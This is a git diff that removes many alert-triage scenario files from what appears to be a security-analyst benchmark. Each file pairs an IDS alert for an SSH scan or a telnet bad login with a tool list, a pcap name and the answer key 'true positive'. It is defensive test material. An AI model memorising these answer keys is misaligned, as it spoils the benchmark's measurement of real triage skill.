b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07529.json deleted file mode 100644 index f8f3459092eaa0ada922ce6600ce04f5ec0ab4b8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07529.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_07529", - "alert_type": "True", - "alert_name": "dp_07529" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:29:06.254882+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:56300 -> 192.168.1.90:22", - "alert": "1970-01-01T05:29:06.254882+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:56300 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07542.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07542.json deleted file mode 100644 index 70ea8723e8cec5a2f9143ed78c527d9496322a59..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_07542.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_07542", - "alert_type": "True", - "alert_name": "dp_07542" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T05:31:00.324959+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:35930 -> 192.168.1.90:22", - "alert": "1970-01-01T05:31:00.324959+0000 \"ET SCAN Potential SSH Scan OUTBOUND\" {TCP} 192.168.1.70:35930 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_08150.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_08150.json deleted file mode 100644 index 5d4b23b14a6af489d6394b2a69bf1a8bdd80ac64..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_08150.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_08150", - "alert_type": "True", - "alert_name": "dp_08150" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T06:18:00.365019+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:52638 -> 192.168.1.90:22", - "alert": "1970-01-02T06:18:00.365019+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:52638 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_08164.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_08164.json deleted file mode 100644 index 5a5d883a9c2a61893558775705a4351626d631db..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_08164.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_08164", - "alert_type": "True", - "alert_name": "dp_08164" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T06:19:59.536435+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:42650 -> 192.168.1.90:22", - "alert": "1970-01-02T06:19:59.536435+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:42650 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_08178.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_08178.json deleted file mode 100644 index 3d2fda149da635ae7cdb2c762e48c993f9dba5a9..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_08178.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_08178", - "alert_type": "True", - "alert_name": "dp_08178" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T06:22:02.970701+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:54624 -> 192.168.1.90:22", - "alert": "1970-01-02T06:22:02.970701+0000 \"ET SCAN Potential SSH Scan\" {TCP} 192.168.1.70:54624 -> 192.168.1.90:22", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_11449.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_11449.json deleted file mode 100644 index 99bed505dfc3acc4f0a5ee1d0a349c3b51fb94fc..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_11449.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_11449", - "alert_type": "True", - "alert_name": "dp_11449" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-05:12:26.887431 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:48734", - "alert": "01/02-05:12:26.887431 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:48734", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_11996.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_11996.json deleted file mode 100644 index 8ac918ef738ead9291b8827195d37689107559cd..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_11996.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_11996", - "alert_type": "True", - "alert_name": "dp_11996" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T05:12:54.338253+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49276", - "alert": "1970-01-02T05:12:54.338253+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49276", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_12054.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_12054.json deleted file mode 100644 index b4921305c2545ae281c6aadfd648d8ce5ff9c82e..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_12054.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_12054", - "alert_type": "True", - "alert_name": "dp_12054" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T05:14:34.056535+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:59628", - "alert": "1970-01-02T05:14:34.056535+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:59628", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_17537.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_17537.json deleted file mode 100644 index 5141a5b863fecf85f7f67dcd157a9f87837b3ea2..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_17537.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_17537", - "alert_type": "True", - "alert_name": "dp_17537" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-23:56:05.310381 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:38028", - "alert": "01/01-23:56:05.310381 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:38028", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_17933.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_17933.json deleted file mode 100644 index e9c3b5dbddc34dd032b1623c05626860297719ff..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_17933.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_17933", - "alert_type": "True", - "alert_name": "dp_17933" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/01-23:58:05.254499 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60676", - "alert": "01/01-23:58:05.254499 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60676", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_18080.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_18080.json deleted file mode 100644 index f282eb9aa814d396eb1c2a9009dec70df4451d06..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_18080.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_18080", - "alert_type": "True", - "alert_name": "dp_18080" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-01T23:56:17.928738+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:37974", - "alert": "1970-01-01T23:56:17.928738+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:37974", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_19336.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_19336.json deleted file mode 100644 index 7feec91e5ec903adac899d24d7eddfdc4d136a0a..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_19336.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_19336", - "alert_type": "True", - "alert_name": "dp_19336" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:04:11.203882 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56112", - "alert": "01/02-00:04:11.203882 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56112", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21007.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21007.json deleted file mode 100644 index 95234d848e9b4eca6b1e8d293e66a163aae1ddbf..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21007.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21007", - "alert_type": "True", - "alert_name": "dp_21007" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:01.794822 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:41700", - "alert": "01/02-00:11:01.794822 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:41700", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21013.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21013.json deleted file mode 100644 index c0d9b0dc36df7a926c60dedecb8cc0163e85fab9..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21013.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21013", - "alert_type": "True", - "alert_name": "dp_21013" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:02.151488 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56606", - "alert": "01/02-00:11:02.151488 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56606", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21044.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21044.json deleted file mode 100644 index 33256598d7a809a7d062bfad9277286fb9fd020d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21044.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21044", - "alert_type": "True", - "alert_name": "dp_21044" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:11.248290 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40172", - "alert": "01/02-00:11:11.248290 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:40172", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21056.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21056.json deleted file mode 100644 index 39756f6a54969374b47469ae849a6fcdce88b625..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21056.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21056", - "alert_type": "True", - "alert_name": "dp_21056" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:15.020584 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47410", - "alert": "01/02-00:11:15.020584 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47410", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21061.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21061.json deleted file mode 100644 index 63a4e354b16ab807249447bf76a0bb4b7fd0fca2..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21061.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21061", - "alert_type": "True", - "alert_name": "dp_21061" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:17.164052 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47426", - "alert": "01/02-00:11:17.164052 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47426", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21086.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21086.json deleted file mode 100644 index 43751ca0fa50ea288cbfce7b65c055c6ff26544b..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21086.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21086", - "alert_type": "True", - "alert_name": "dp_21086" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:23.569855 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47440", - "alert": "01/02-00:11:23.569855 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:47440", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21099.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21099.json deleted file mode 100644 index 477d5415d04b310eae17679948e4b73e098ed7bb..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21099.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21099", - "alert_type": "True", - "alert_name": "dp_21099" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:28.060390 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51252", - "alert": "01/02-00:11:28.060390 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51252", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21131.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21131.json deleted file mode 100644 index 1091f70fcf5d80cd7d5ef8b36973c22d214884b1..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21131.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21131", - "alert_type": "True", - "alert_name": "dp_21131" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 01/02-00:11:36.989674 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:55970", - "alert": "01/02-00:11:36.989674 \"PROTOCOL-TELNET login incorrect\" {TCP} 192.168.1.90:23 -> 192.168.1.70:55970", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21145.json b/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21145.json deleted file mode 100644 index 5a44ad63c33706c6a4a26bcf3dcf1d0c743e0b44..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_TII/TP/scenario_dp_21145.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21145", - "alert_type": "True", - "alert_name": "dp_21145" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert 